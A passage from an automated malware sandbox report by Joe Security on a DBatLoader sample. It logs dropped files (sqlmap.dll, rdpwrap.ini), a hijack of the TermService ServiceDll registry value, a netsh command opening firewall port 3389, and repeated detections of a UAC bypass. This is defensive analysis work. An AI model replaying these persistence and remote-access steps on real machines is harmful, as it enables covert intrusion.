00000011.00000003.330089924.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
File Activities
File Created
File Path Access Attributes Options Completion Count Source Address Symbol
C:\Users\user\AppData\Local\Microsoft Vision\ read data or list device directory file | success or wait 1 7D756F CreateDirect
directory | synchronous io oryW
synchronize non alert | open
for backup ident
| open reparse
point
C:\Program Files\Microsoft DN1\sqlmap.dll read attributes | device synchronous io success or wait 1 7D3AFE CreateFileW
synchronize | non alert | non
generic read | directory file
generic write
C:\Windows\System32\rfxvmt.dll read attributes | device synchronous io object name collision 1 7D3AFE CreateFileW
synchronize | non alert | non
generic read | directory file
generic write
C:\Program Files\Microsoft DN1\rdpwrap.ini read attributes | device synchronous io success or wait 1 7D3AFE CreateFileW
synchronize | non alert | non
generic read | directory file
generic write
C:\Users\user\AppData\Roaming\.JmyHai.tmp read data or list device sequential only | success or wait 1 7CFC2A CopyFileW
directory | read non directory file
attributes |
delete | write dac
| synchronize |
generic read |
generic write
C:\Users\user\AppData\Roaming\JJrxrvA.tmp read data or list device sequential only | success or wait 1 7CFC3E CopyFileW
directory | read synchronous io
attributes | non alert | non
delete | write dac directory file
| synchronize |
generic read |
generic write
File Deleted
File Path Completion Count Source Address Symbol
File Written
File Path Offset Length Value Ascii Completion Count Source Address Symbol
C:\Program Files\Microsoft DN1 0 116736 4d 5a fd 00 03 00 00 00 MZ@!L!This program success or wait 1 7D3EE8 WriteFile
\sqlmap.dll 04 00 00 00 fd fd 00 00 fd cannot be run in DOS
00 00 00 00 00 00 00 40 mode.$NrB/!B/!B/!~!j
00 00 00 00 00 00 00 00 /!~!&/!~3!H/!'!G/!B/!/!O}!F/
00 00 00 00 00 00 00 00 !O
00 00 00 00 00 00 00 00 }0!C/!O}7!C/!O}2!C/!Rich
00 00 00 00 00 00 00 00 B/!PEdZT
00 00 00 fd 00 00 00 0e
1f fd 0e 00 fd 09 fd 21 fd
01 4c fd 21 54 68 69 73
20 70 72 6f 67 72 61 6d
20 63 61 6e 6e 6f 74 20
62 65 20 72 75 6e 20 69
6e 20 44 4f 53 20 6d 6f
64 65 2e 0d 0d 0a 24 00
00 00 00 00 00 00 06 4e
fd 72 42 2f fd 21 42 2f fd
21 42 2f fd 21 04 7e 0d
21 6a 2f fd 21 04 7e 0c
21 26 2f fd 21 04 7e 33
21 48 2f fd 21 fd fd 27 21
47 2f fd 21 42 2f fd 21 1d
2f fd 21 4f 7d 09 21 46 2f
fd 21 4f 7d 30 21 43 2f fd
21 4f 7d 37 21 43 2f fd 21
4f 7d 32 21 43 2f fd 21 52
69 63 68 42 2f fd 21 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 50
45 00 00 64 fd 06 00 5a
fd fd 54 00 00 00
C:\Program Files\Microsoft DN1 0 281633 3b 20 52 44 50 20 57 72 ; RDP Wrapper Library success or wait 1 7D3EE8 WriteFile
\rdpwrap.ini 61 70 70 65 72 20 4c 69 configuration; Do not
62 72 61 72 79 20 63 6f modify without special
6e 66 69 67 75 72 61 74 knowledge; Edited by se
69 6f 6e 0d 0a 3b 20 44 baxakerhtc[Main]Updated
6f 20 6e 6f 74 20 6d 6f 64 =2022-07-
69 66 79 20 77 69 74 68 02LogFile=\rdpwrap.txtSL
6f 75 74 20 73 70 65 63 Poli
69 61 6c 20 6b 6e 6f 77 cyHookNT60=1SLPolicy
6c 65 64 67 65 0d 0a 3b HookNT61=1
20 45 64 69 74 65 64 20 [SLPolicy]TerminalServic
62 79 20 73 65 62 61 78 es-Rem
61 6b 65 72 68 74 63 0d oteConnectionManager-
0a 0d 0a 5b 4d 61 69 6e Al
5d 0d 0a 55 70 64 61 74
65 64 3d 32 30 32 32 2d
30 37 2d 30 32 0d 0a 4c
6f 67 46 69 6c 65 3d 5c
72 64 70 77 72 61 70 2e
74 78 74 0d 0a 53 4c 50
6f 6c 69 63 79 48 6f 6f 6b
4e 54 36 30 3d 31 0d 0a
53 4c 50 6f 6c 69 63 79
48 6f 6f 6b 4e 54 36 31
3d 31 0d 0a 0d 0a 5b 53
4c 50 6f 6c 69 63 79 5d
0d 0a 54 65 72 6d 69 6e
61 6c 53 65 72 76 69 63
65 73 2d 52 65 6d 6f 74
65 43 6f 6e 6e 65 63 74
69 6f 6e 4d 61 6e 61 67
65 72 2d 41 6c
File Read
File Path Offset Length Completion Count Source Address Symbol
Registry Activities
Key Created
Key Path Completion Count Source Address Symbol
HKEY_LOCAL_MACH ServiceDll expand unicode %SystemRoot%\System3 %ProgramFiles%\Micr success or wait 1 7D1447 RegSetValueEx
INE\SYSTEM\Cont 2\termsrv.dll osoft DN1\sqlmap.dll W
rolSet001\Services\Ter
mService\Parameters
General
Target ID: 18
Path: C:\Users\Public\Libraries\Scxozm.exe
Commandline: "C:\Users\Public\Libraries\Scxozm.exe"
Imagebase: 0x400000
Yara matches: Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.354789031.0000000004D7C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Copyright Joe Security LLC 2022 Page 59 of 74
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.384759325.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.355139169.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.345280997.0000000002A78000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.377597243.0000000004EBC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.369788133.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.380907384.0000000004E48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.358484770.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.360661759.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.360999654.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.348500481.0000000004D7C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.382569178.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.365040453.0000000004D54000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.361850386.0000000002A6C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.375438559.0000000004E44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.379204485.0000000004E48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.352117778.0000000004D4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.380485571.0000000004E84000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.372039435.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.349780560.0000000004D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.363162364.0000000004D54000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.378461807.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.351118201.0000000004D4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.371282125.0000000004E7C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.345725899.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.365734311.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.355626617.0000000004D7C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.356609035.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.372284500.0000000004E44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.346314388.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.347214520.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.356759787.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.371440730.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.348883188.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.380206131.0000000004E48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.347105324.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.348304487.0000000004D4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.378931445.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.376535794.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.378846008.0000000004EB8000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.346948621.0000000004D4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.355869791.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.385310318.0000000004E84000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000012.00000002.394885149.00000000029A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.378071413.0000000004E48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000012.00000003.369348794.0000000004E78000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
File Activities
File Created
File Path Access Attributes Options Completion Count Source Address Symbol
C:\Users\user read data or list device directory file | object name collision 1 29942FC InternetOpen
directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point
C:\Users\user\AppData\Local read data or list device directory file | object name collision 1 29942FC InternetOpen
directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point
C:\Users\user\AppData\Local\Mi read data or list device directory file | object name collision 1 29942FC InternetOpen
crosoft\Windows\INetCache directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point
C:\Users\user read data or list device directory file | object name collision 1 29942FC InternetOpen
directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point
C:\Users\user\AppData\Local read data or list device directory file | object name collision 1 29942FC InternetOpen
directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point
C:\Users\user\AppData\Local\Mi read data or list device directory file | object name collision 1 29942FC InternetOpen
crosoft\Windows\INetCookies directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point
C:\Users\user read data or list device directory file | object name collision 1 29942FC InternetOpen
directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point
C:\Users\user\AppData\Local read data or list device directory file | object name collision 1 29942FC InternetOpen
directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point
C:\Users\user\AppData\Local\Mi read data or list device directory file | object name collision 1 29942FC InternetOpen
crosoft\Windows\INetCookies directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point
C:\Users\user read data or list device directory file | object name collision 1 29942FC InternetOpen
directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point
C:\Users\user\AppData\Local read data or list device directory file | object name collision 1 29942FC InternetOpen
directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point
C:\Users\user\AppData\Local\Microsoft\Windows\History read data or list device directory file | object name collision 1 29942FC InternetOpen
directory | synchronous io UrlA
synchronize non alert | open
for backup ident
| open reparse
point
File Written
File Path Offset Length Value Ascii Completion Count Source Address Symbol
File Read
File Path Offset Length Completion Count Source Address Symbol
General
Target ID: 19
Path: C:\Users\user\AppData\Local\Temp\159.exe
Commandline: "C:\Users\user\AppData\Local\Temp\159.exe"
Imagebase: 0xd60000
Reputation: low
General
Target ID: 20
Path: C:\Windows\SysWOW64\netsh.exe
Commandline: netsh advfirewall firewall add rule name="3389" dir=in action=allow protocol=TCP localport=3389
Imagebase: 0x13a0000
Reputation: high
File Activities
File Path Access Attributes Options Completion Count Source Address Symbol
File Written
File Path Offset Length Value Ascii Completion Count Source Address Symbol
General
Target ID: 21
Path: C:\Windows\System32\conhost.exe
Imagebase: 0x7ff647620000
Reputation: high
General
Target ID: 22
Path: C:\Users\Public\Libraries\Scxozm.exe
Commandline: "C:\Users\Public\Libraries\Scxozm.exe"
Imagebase: 0x400000
Yara matches: Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000002.422414404.0000000004E07000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.394075935.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.370114665.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.387124471.0000000002AAC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.378007228.0000000004C40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.397338070.0000000004D04000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.398107678.0000000004D04000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000002.422007265.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.393404052.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Copyright Joe Security LLC 2022 Page 66 of 74
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.373686381.0000000004C3C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.407220167.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.390379326.0000000004D0C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.383118429.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.388544254.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.398778273.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.373772928.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.370451742.0000000002AAC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.388062879.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.384360947.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.412380843.0000000004D44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.379396536.0000000004C40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.391906868.0000000004D04000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.390591636.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.393899595.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.393747645.0000000004D04000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.370535271.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.374560729.0000000004C3C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.383423241.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.396634821.0000000004D08000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.404674093.0000000004D08000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.388211658.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.388855935.0000000002AAC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.388923590.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.384993781.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.370350747.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.400892511.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.403122724.0000000004D08000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.401121981.0000000004D78000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.400454276.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.380218201.0000000004C0C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.391110979.0000000004D08000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.389260437.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.379972211.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.385800327.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.371177793.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.388390517.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.409836652.0000000004D44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.401551177.0000000004D08000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.377465170.0000000004C0C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.371296732.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.396147021.0000000004D3C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000016.00000000.346993004.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000016.00000002.423063785.000000007FD60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.371056323.0000000002AAC000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
Copyright Joe Security LLC 2022 Page 67 of 74
00000016.00000003.369819049.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.386918501.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000016.00000003.400731941.0000000004D08000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
